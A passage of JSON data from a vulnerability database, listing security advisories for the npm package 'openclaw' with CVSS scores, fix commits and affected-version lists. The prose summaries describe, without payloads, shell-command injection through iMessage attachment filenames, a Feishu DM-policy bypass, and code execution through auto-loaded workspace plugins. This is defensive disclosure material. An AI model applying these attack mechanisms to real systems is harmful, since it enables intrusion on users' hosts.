,{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-
x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-8jhh-jcqg-mj5p"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hse8-g1e9-dbay"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91122?format=json","vulnerability_id":"VCID-hynd-965v-n3aq","summary":"OpenClaw accepts unsanitized iMessage attachment paths which allowed SCP remote-path command injection\n### Summary\n`openclaw` versions `<= 2026.3.12` accepted unsanitized 
iMessage remote attachment paths when staging files over SCP, allowing shell metacharacters in the remote path operand.\n\n### Affected Packages / Versions\n- Package: `openclaw` (`npm`)\n- Affected versions: `<= 2026.3.12`\n- Fixed version: `2026.3.13`\n\n### Details\nThe vulnerable path was the remote attachment staging flow in `src/auto-reply/reply/stage-sandbox-media.ts`. When `ctx.MediaRemoteHost` was set, OpenClaw staged the attachment by spawning `/usr/bin/scp` against `<remoteHost>:<remotePath>`. In affected releases, the remote host was normalized but the remote attachment path was not validated for shell metacharacters before being passed to the SCP remote operand. A sender-controlled iMessage attachment filename containing shell metacharacters could therefore trigger command execution on the configured remote host when remote attachment staging was enabled.\n\nThis issue is in scope under OpenClaw's trust model because it crosses an inbound content boundary into host command execution on a configured remote attachment host.\n\n### Fix\n`openclaw@2026.3.13` validates the SCP remote path before spawning `scp`. 
Current code calls `normalizeScpRemotePath(...)` and rejects paths containing shell metacharacters instead of passing them through to the remote shell.\n\nRegression coverage exists in `src/auto-reply/reply.stage-sandbox-media.scp-remote-path.test.ts` (`rejects remote attachment filenames with shell metacharacters before spawning scp`).\n\n### Fix Commit(s)\n- `a54bf71b4c0cbe554a84340b773df37ee8e959de`\n\nThanks @lintsinghua for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a54bf71b4c0cbe554a84340b773df37ee8e959de","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/a54bf71b4c0cbe554a84340b773df37ee8e959de"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g2f6-pwvx-r275","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g2f6-pwvx-r275"},{"reference_url":"https://github.com/advisories/GHSA-g2f6-pwvx-r275","reference_id":"GHSA-g2f6-pwvx-r275","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://githu
b.com/advisories/GHSA-g2f6-pwvx-r275"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113139?format=json","purl":"pkg:npm/openclaw@2026.3.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VC
ID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VC
ID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VC
ID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VC
ID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VC
ID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.13"}],"aliases":["GHSA-g2f6-pwvx-r275"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hynd-965v-n3aq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89119?format=json","vulnerability_id":"VCID-hz33-9efv-c7ef","summary":"OpenClaw: Feishu card actions could misclassify DMs and skip dmPolicy\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nFeishu card-action callbacks could synthesize a message event with DM conversations classified as group conversations. 
That skipped `dmPolicy` enforcement for card actions, so a sender in a Feishu DM could trigger card-action flows that should have been blocked by a restrictive DM policy.\n\nThe issue is limited to Feishu card-action handling. Severity is medium.\n\n## Fix\n\nOpenClaw now resolves Feishu card-action chat type before dispatch, including API lookup when stored context is unavailable, and avoids falling through to group handling for DMs.\n\nFix commit:\n\n- `90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-72q8-jcmc-97wx","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-72q8-jcmc-97wx"},{"reference_url":"https://github.com/advisories/GHSA-72q8-jcmc-97wx","reference_id":"GHSA-72q8-jcmc-97wx","reference_
type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-72q8-jcmc-97wx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["GHSA-72q8-jcmc-97wx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hz33-9efv-c7ef"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91550?format=json","vulnerability_id":"VCID-hzbt-fbgp-h7fd","summary":"Duplicate Advisory: OpenClaw: Workspace plugin auto-discovery allowed code execution from cloned repositories\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-99qw-6mr3-36qr. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.12 automatically discovers and loads plugins from .OpenClaw/extensions/ without explicit trust verification, allowing arbitrary code execution. 
Attackers can execute malicious code by including crafted workspace plugins in cloned repositories that execute when users run OpenClaw from the directory.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-99qw-6mr3-36qr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-99qw-6mr3-36qr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32920","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32920"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-auto-discovery-of-workspace-plugins","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","sco
